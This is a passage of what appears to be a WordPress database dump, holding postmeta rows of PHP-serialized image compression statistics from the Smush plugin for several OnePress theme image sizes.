":5:{s:7:\"percent\";d:19.75;s:5:\"bytes\";i:24582;s:11:\"size_before\";i:124495;s:10:\"size_after\";i:99913;s:4:\"time\";d:0.25;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:41.75999999999999801048033987171947956085205078125;s:5:\"bytes\";i:44605;s:11:\"size_before\";i:106821;s:10:\"size_after\";i:62216;s:4:\"time\";d:0.36999999999999999555910790149937383830547332763671875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.75;s:5:\"bytes\";i:6741;s:11:\"size_before\";i:34124;s:10:\"size_after\";i:27383;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.530000000000001136868377216160297393798828125;s:5:\"bytes\";i:15638;s:11:\"size_before\";i:76177;s:10:\"size_after\";i:60539;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.809999999999998721023075631819665431976318359375;s:5:\"bytes\";i:20418;s:11:\"size_before\";i:103071;s:10:\"size_after\";i:82653;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}}}'),(4145,2473,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.032163550084447933841147460043430328369140625;s:5:\"bytes\";i:64642;s:11:\"size_before\";i:379529;s:10:\"size_after\";i:314887;s:4:\"time\";d:1.20999999999999996447286321199499070644378662109375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.3599999999999994315658113919198513031005859375;s:5:\"bytes\";i:3551;s:11:\"size_before\";i:17443;s:10:\"size_after\";i:13892;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:7598;s:11:\"size_before\";i:45182;s:10:\"size_after\";i:37584;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.379999999999999005240169935859739780426025390625;s:5:\"bytes\";i:7699;s:11:\"size_before\";i:37776;s:10:\"size_after\";i:30077;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.53999999999999914734871708787977695465087890625;s:5:\"bytes\";i:12667;s:11:\"size_before\";i:93548;s:10:\"size_after\";i:80881;s:4:\"time\";d:0.2600000000000000088817841970012523233890533447265625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.85000000000000142108547152020037174224853515625;s:5:\"bytes\";i:33127;s:11:\"size_before\";i:185580;s:10:\"size_after\";i:152453;s:4:\"time\";d:0.63000000000000000444089209850062616169452667236328125;}}}'),(4146,2472,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:14.6761646526547853142119492986239492893218994140625;s:5:\"bytes\";i:56183;s:11:\"size_before\";i:382818;s:10:\"size_after\";i:326635;s:4:\"time\";d:0.8200000000000000621724893790087662637233734130859375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.7799999999999993605115378159098327159881591796875;s:5:\"bytes\";i:2897;s:11:\"size_before\";i:18364;s:10:\"size_after\";i:15467;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:7314;s:11:\"size_before\";i:46229;s:10:\"size_after\";i:38915;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.7400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:5959;s:11:\"size_before\";i:37852;s:10:\"size_after\";i:31893;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:13337;s:11:\"size_before\";i:98869;s:10:\"size_after\";i:85532;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:26676;s:11:\"size_before\";i:181504;s:10:\"size_after\";i:154828;s:4:\"time\";d:0.419999999999999984456877655247808434069156646728515625;}}}'),(4147,2471,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:24.687973147647841898333354038186371326446533203125;s:5:\"bytes\";i:129304;s:11:\"size_before\";i:523753;s:10:\"size_after\";i:394449;s:4:\"time\";d:1.720000000000000195399252334027551114559173583984375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.260000000000001563194018672220408916473388671875;s:5:\"bytes\";i:2570;s:11:\"size_before\";i:15808;s:10:\"size_after\";i:13238;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:7443;s:11:\"size_before\";i:41303;s:10:\"size_after\";i:33860;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.760000000000001563194018672220408916473388671875;s:5:\"bytes\";i:27148;s:11:\"size_before\";i:130744;s:10:\"size_after\";i:103596;s:4:\"time\";d:0.34999999999999997779553950749686919152736663818359375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:42.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:48895;s:11:\"size_before\";i:114566;s:10:\"size_after\";i:65671;s:4:\"time\";d:0.57999999999999996003197111349436454474925994873046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.39999999999999857891452847979962825775146484375;s:5:\"bytes\";i:6058;s:11:\"size_before\";i:36934;s:10:\"size_after\";i:30876;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.8900000000000005684341886080801486968994140625;s:5:\"bytes\";i:15618;s:11:\"size_before\";i:78521;s:10:\"size_after\";i:62903;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.370000000000000994759830064140260219573974609375;s:5:\"bytes\";i:21572;s:11:\"size_before\";i:105877;s:10:\"size_after\";i:84305;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;}}}'),(4148,2470,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:13.3464214684448467806987537187524139881134033203125;s:5:\"bytes\";i:72945;s:11:\"size_before\";i:546551;s:10:\"size_after\";i:473606;s:4:\"time\";d:1.140000000000000124344978758017532527446746826171875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.760000000000001563194018672220408916473388671875;s:5:\"bytes\";i:3450;s:11:\"size_before\";i:16620;s:10:\"size_after\";i:13170;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:7863;s:11:\"size_before\";i:41735;s:10:\"size_after\";i:33872;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.53999999999999914734871708787977695465087890625;s:5:\"bytes\";i:15994;s:11:\"size_before\";i:127498;s:10:\"size_after\";i:111504;s:4:\"time\";d:0.25;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:9899;s:11:\"size_before\";i:152488;s:10:\"size_after\";i:142589;s:4:\"time\";d:0.2600000000000000088817841970012523233890533447265625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.739999999999998436805981327779591083526611328125;s:5:\"bytes\";i:6044;s:11:\"size_before\";i:34068;s:10:\"size_after\";i:28024;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:13677;s:11:\"size_before\";i:72309;s:10:\"size_after\";i:58632;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:16018;s:11:\"size_before\";i:101833;s:10:\"size_after\";i:85815;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}}}'),(4149,2469,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.5244855160970676166698467568494379520416259765625;s:5:\"bytes\";i:65217;s:11:\"size_before\";i:520716;s:10:\"size_after\";i:455499;s:4:\"time\";d:0.86999999999999999555910790149937383830547332763671875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.28999999999999914734871708787977695465087890625;s:5:\"bytes\";i:2740;s:11:\"size_before\";i:24273;s:10:\"size_after\";i:21533;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.6199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:7513;s:11:\"size_before\";i:59554;s:10:\"size_after\";i:52041;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:7073;s:11:\"size_before\";i:51529;s:10:\"size_after\";i:44456;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.8300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:16156;s:11:\"size_before\";i:136525;s:10:\"size_after\";i:120369;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.75;s:5:\"bytes\";i:31735;s:11:\"size_before\";i:248835;s:10:\"size_after\";i:217100;s:4:\"time\";d:0.39000000000000001332267629550187848508358001708984375;}}}'),(4150,2468,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:24.595692815867778335814364254474639892578125;s:5:\"bytes\";i:123904;s:11:\"size_before\";i:503763;s:10:\"size_after\";i:379859;s:4:\"time\";d:1.359999999999999875655021241982467472553253173828125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.1700000000000017053025658242404460906982421875;s:5:\"bytes\";i:3016;s:11:\"size_before\";i:14955;s:10:\"size_after\";i:11939;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.17999999999999971578290569595992565155029296875;s:5:\"bytes\";i:8904;s:11:\"size_before\";i:44120;s:10:\"size_after\";i:35216;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.75;s:5:\"bytes\";i:24582;s:11:\"size_before\";i:124495;s:10:\"size_after\";i:99913;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:41.75999999999999801048033987171947956085205078125;s:5:\"bytes\";i:44605;s:11:\"size_before\";i:106821;s:10:\"size_after\";i:62216;s:4:\"time\";d:0.4899999999999999911182158029987476766109466552734375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.75;s:5:\"bytes\";i:6741;s:11:\"size_before\";i:34124;s:10:\"size_after\";i:27383;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.530000000000001136868377216160297393798828125;s:5:\"bytes\";i:15638;s:11:\"size_before\";i:76177;s:10:\"size_after\";i:60539;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.809999999999998721023075631819665431976318359375;s:5:\"bytes\";i:20418;s:11:\"size_before\";i:103071;s:10:\"size_after\";i:82653;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}}}'),(4151,2467,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:15.7899144750354434307837436790578067302703857421875;s:5:\"bytes\";i:79185;s:11:\"size_before\";i:501491;s:10:\"size_after\";i:422306;s:4:\"time\";d:1.0100000000000000088817841970012523233890533447265625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:3480;s:11:\"size_before\";i:22322;s:10:\"size_after\";i:18842;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.3599999999999994315658113919198513031005859375;s:5:\"bytes\";i:8930;s:11:\"size_before\";i:58140;s:10:\"size_after\";i:49210;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.280000000000001136868377216160297393798828125;s:5:\"bytes\";i:8220;s:11:\"size_before\";i:50490;s:10:\"size_after\";i:42270;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:18421;s:11:\"size_before\";i:128326;s:10:\"size_after\";i:109905;s:4:\"time\";d:0.25;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:40134;s:11:\"size_before\";i:242213;s:10:\"size_after\";i:202079;s:4:\"time\";d:0.479999999999999982236431605997495353221893310546875;}}}'),(4152,2466,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.032163550084447933841147460043430328369140625;s:5:\"bytes\";i:64642;s:11:\"size_before\";i:379529;s:10:\"size_after\";i:314887;s:4:\"time\";d:1.0800000000000000710542735760100185871124267578125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.3599999999999994315658113919198513031005859375;s:5:\"bytes\";i:3551;s:11:\"size_before\";i:17443;s:10:\"size_after\";i:13892;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:7598;s:11:\"size_before\";i:45182;s:10:\"size_after\";i:37584;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.379999999999999005240169935859739780426025390625;s:5:\"bytes\";i:7699;s:11:\"size_before\";i:37776;s:10:\"size_after\";i:30077;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.53999999999999914734871708787977695465087890625;s:5:\"bytes\";i:12667;s:11:\"size_before\";i:93548;s:10:\"size_after\";i:80881;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.85000000000000142108547152020037174224853515625;s:5:\"bytes\";i:33127;s:11:\"size_before\";i:185580;s:10:\"size_after\";i:152453;s:4:\"time\";d:0.64000000000000001332267629550187848508358001708984375;}}}'),(4153,2465,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:24.039294874332949092377020861022174358367919921875;s:5:\"bytes\";i:218572;s:11:\"size_before\";i:909228;s:10:\"size_after\";i:690656;s:4:\"time\";d:1.6799999999999999378275106209912337362766265869140625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.6199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:3078;s:11:\"size_before\";i:24387;s:10:\"size_after\";i:21309;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.7799999999999993605115378159098327159881591796875;s:5:\"bytes\";i:9381;s:11:\"size_before\";i:59442;s:10:\"size_after\";i:50061;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.9700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:29428;s:11:\"size_before\";i:226951;s:10:\"size_after\";i:197523;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:50.090000000000003410605131648480892181396484375;s:5:\"bytes\";i:126063;s:11:\"size_before\";i:251658;s:10:\"size_after\";i:125595;s:4:\"time\";d:0.70999999999999996447286321199499070644378662109375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.8699999999999992184029906638897955417633056640625;s:5:\"bytes\";i:7187;s:11:\"size_before\";i:51821;s:10:\"size_after\";i:44634;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.6500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:18661;s:11:\"size_before\";i:119212;s:10:\"size_after\";i:100551;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.0999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:24774;s:11:\"size_before\";i:175757;s:10:\"size_after\";i:150983;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;}}}'),(4154,2464,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:15.25373770536406681230801041238009929656982421875;s:5:\"bytes\";i:67276;s:11:\"size_before\";i:441046;s:10:\"size_after\";i:373770;s:4:\"time\";d:1.12000000000000010658141036401502788066864013671875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:3033;s:11:\"size_before\";i:20634;s:10:\"size_after\";i:17601;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:8038;s:11:\"size_before\";i:51799;s:10:\"size_after\";i:43761;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:7426;s:11:\"size_before\";i:43178;s:10:\"size_after\";i:35752;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.7200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:14006;s:11:\"size_before\";i:110101;s:10:\"size_after\";i:96095;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.14999999999999857891452847979962825775146484375;s:5:\"bytes\";i:34773;s:11:\"size_before\";i:215334;s:10:\"size_after\";i:180561;s:4:\"time\";d:0.68000000000000004884981308350688777863979339599609375;}}}'),(4155,2463,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.55013406924627616945144836790859699249267578125;s:5:\"bytes\";i:79910;s:11:\"size_before\";i:408744;s:10:\"size_after\";i:328834;s:4:\"time\";d:1.0800000000000000710542735760100185871124267578125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.620000000000000994759830064140260219573974609375;s:5:\"bytes\";i:3832;s:11:\"size_before\";i:19527;s:10:\"size_after\";i:15695;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.129999999999999005240169935859739780426025390625;s:5:\"bytes\";i:9679;s:11:\"size_before\";i:48071;s:10:\"size_after\";i:38392;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:8361;s:11:\"size_before\";i:40964;s:10:\"size_after\";i:32603;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:18467;s:11:\"size_before\";i:103535;s:10:\"size_after\";i:85068;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.120000000000000994759830064140260219573974609375;s:5:\"bytes\";i:39571;s:11:\"size_before\";i:196647;s:10:\"size_after\";i:157076;s:4:\"time\";d:0.60999999999999998667732370449812151491641998291015625;}}}'),(4156,2462,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:23.16393215142364425673804362304508686065673828125;s:5:\"bytes\";i:175278;s:11:\"size_before\";i:756685;s:10:\"size_after\";i:581407;s:4:\"time\";d:1.640000000000000124344978758017532527446746826171875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.269999999999999573674358543939888477325439453125;s:5:\"bytes\";i:2433;s:11:\"size_before\";i:18337;s:10:\"size_after\";i:15904;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.25;s:5:\"bytes\";i:6591;s:11:\"size_before\";i:46246;s:10:\"size_after\";i:39655;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:21321;s:11:\"size_before\";i:182506;s:10:\"size_after\";i:161185;s:4:\"time\";d:0.35999999999999998667732370449812151491641998291015625;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:45.39999999999999857891452847979962825775146484375;s:5:\"bytes\";i:105140;s:11:\"size_before\";i:231588;s:10:\"size_after\";i:126448;s:4:\"time\";d:0.54000000000000003552713678800500929355621337890625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.2200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:5824;s:11:\"size_before\";i:40968;s:10:\"size_after\";i:35144;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.2400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:13409;s:11:\"size_before\";i:94134;s:10:\"size_after\";i:80725;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.3900000000000005684341886080801486968994140625;s:5:\"bytes\";i:20560;s:11:\"size_before\";i:142906;s:10:\"size_after\";i:122346;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;}}}'),(4157,2461,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.325935626163072811323218047618865966796875;s:5:\"bytes\";i:86924;s:11:\"size_before\";i:449779;s:10:\"size_after\";i:362855;s:4:\"time\";d:0.979999999999999982236431605997495353221893310546875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:5288;s:11:\"size_before\";i:21232;s:10:\"size_after\";i:15944;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:10979;s:11:\"size_before\";i:53085;s:10:\"size_after\";i:42106;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.64999999999999857891452847979962825775146484375;s:5:\"bytes\";i:10091;s:11:\"size_before\";i:46603;s:10:\"size_after\";i:36512;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.46000000000000085265128291212022304534912109375;s:5:\"bytes\";i:19895;s:11:\"size_before\";i:113974;s:10:\"size_after\";i:94079;s:4:\"time\";d:0.2800000000000000266453525910037569701671600341796875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:40671;s:11:\"size_before\";i:214885;s:10:\"size_after\";i:174214;s:4:\"time\";d:0.5;}}}'),(4158,2460,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.098523374793213491784626967273652553558349609375;s:5:\"bytes\";i:55813;s:11:\"size_before\";i:326420;s:10:\"size_after\";i:270607;s:4:\"time\";d:0.9199999999999999289457264239899814128875732421875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.239999999999998436805981327779591083526611328125;s:5:\"bytes\";i:2413;s:11:\"size_before\";i:14856;s:10:\"size_after\";i:12443;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.260000000000001563194018672220408916473388671875;s:5:\"bytes\";i:7167;s:11:\"size_before\";i:39243;s:10:\"size_after\";i:32076;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.0799999999999982946974341757595539093017578125;s:5:\"bytes\";i:5706;s:11:\"size_before\";i:29905;s:10:\"size_after\";i:24199;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.6300000000000007815970093361102044582366943359375;s:5:\"bytes\";i:11867;s:11:\"size_before\";i:81135;s:10:\"size_after\";i:69268;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:28660;s:11:\"size_before\";i:161281;s:10:\"size_after\";i:132621;s:4:\"time\";d:0.440000000000000002220446049250313080847263336181640625;}}}'),(4159,2459,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:23.23783174135336793142414535395801067352294921875;s:5:\"bytes\";i:90038;s:11